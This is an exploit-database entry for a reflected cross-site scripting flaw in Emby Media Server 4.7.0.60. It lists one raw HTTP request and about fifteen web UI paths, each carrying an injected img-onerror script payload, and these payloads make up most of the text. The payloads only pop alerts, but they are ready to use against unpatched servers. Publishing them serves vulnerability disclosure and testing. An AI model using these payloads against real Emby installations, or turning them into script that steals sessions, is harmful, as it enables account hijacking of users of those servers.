Exploit for Emby Media Server 4.7.0.60 Cross Site Scripting Vulnerability

Name: Exploit for Emby Media Server 4.7.0.60 Cross Site Scripting Vulnerability
Rating: 5 (156 reviews)
2022-05-21 | CVSS 0.1
## https://sploitus.com/exploit?id=1337DAY-ID-37744
# Exploit Title: Emby Media Server 4.7.0.60 Cross Site Scripting 
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://emby.media/
# Software Link: https://emby.media/windows-server.html
# Version: 4.7.0.60
# Tested on: Windows 7 / 10


Summary: Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model.

Description: Reflected XSS  found on the follwoing paths 


GET /web/index.htmlwkdlv%3cimg%20src%3da%20onerror%3dalert('xssyf')%3etsz47 HTTP/1.1
Host: 192.168.1.99:8096
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Cache-Control: max-age=0

/web/apploader.jsgavm5%3cimg%20src%3da%20onerror%3dalert(1)%3efekx9?v=4.7.0.60
/web/manifest.jsono32b7%3cimg%20src%3da%20onerror%3dalert(1)%3ebhmxn 
/web/modules/common/strings/en-GB.jsons0ult%3cimg%20src%3da%20onerror%3dalert(1)%3es9n62?v=4.7.0.60
/web/modulesd3s7a%3cimg%20src%3da%20onerror%3dalert(1)%3ez7ego/common/strings/en-GB.json?v=4.7.0.60 
/web/modules/commonat2op%3cimg%20src%3da%20onerror%3dalert(1)%3eobgl7/strings/en-GB.json?v=4.7.0.60
/web/modules/common/stringshh0u9%3cimg%20src%3da%20onerror%3dalert(1)%3et78cc/en-GB.json?v=4.7.0.60
/web/modules/themes/dark/theme.jsonl0ofz%3cimg%20src%3da%20onerror%3dalert(1)%3edltvh?v=4.7.0.60
/web/modulesx4l2h%3cimg%20src%3da%20onerror%3dalert(1)%3emr73x/themes/dark/theme.json?v=4.7.0.60 
/web/modules/themesm2gyr%3cimg%20src%3da%20onerror%3dalert(1)%3ek2oyi/dark/theme.json?v=4.7.0.60
/web/modules/themes/darknhu2c%3cimg%20src%3da%20onerror%3dalert(1)%3ez9cpp/theme.json?v=4.7.0.60
/web/startup/login.htmljpi2c%3cimg%20src%3da%20onerror%3dalert(1)%3enwvie?v=4.7.0.60
/web/startupipm82%3cimg%20src%3da%20onerror%3dalert(1)%3ei44hr/login.html?v=4.7.0.60
/web/strings/en-GB.jsonqulu8%3cimg%20src%3da%20onerror%3dalert(1)%3eghzge?v=4.7.0.60
/web/stringsxyvvd%3cimg%20src%3da%20onerror%3dalert(1)%3ewliqe/en-GB.json?v=4.7.0.60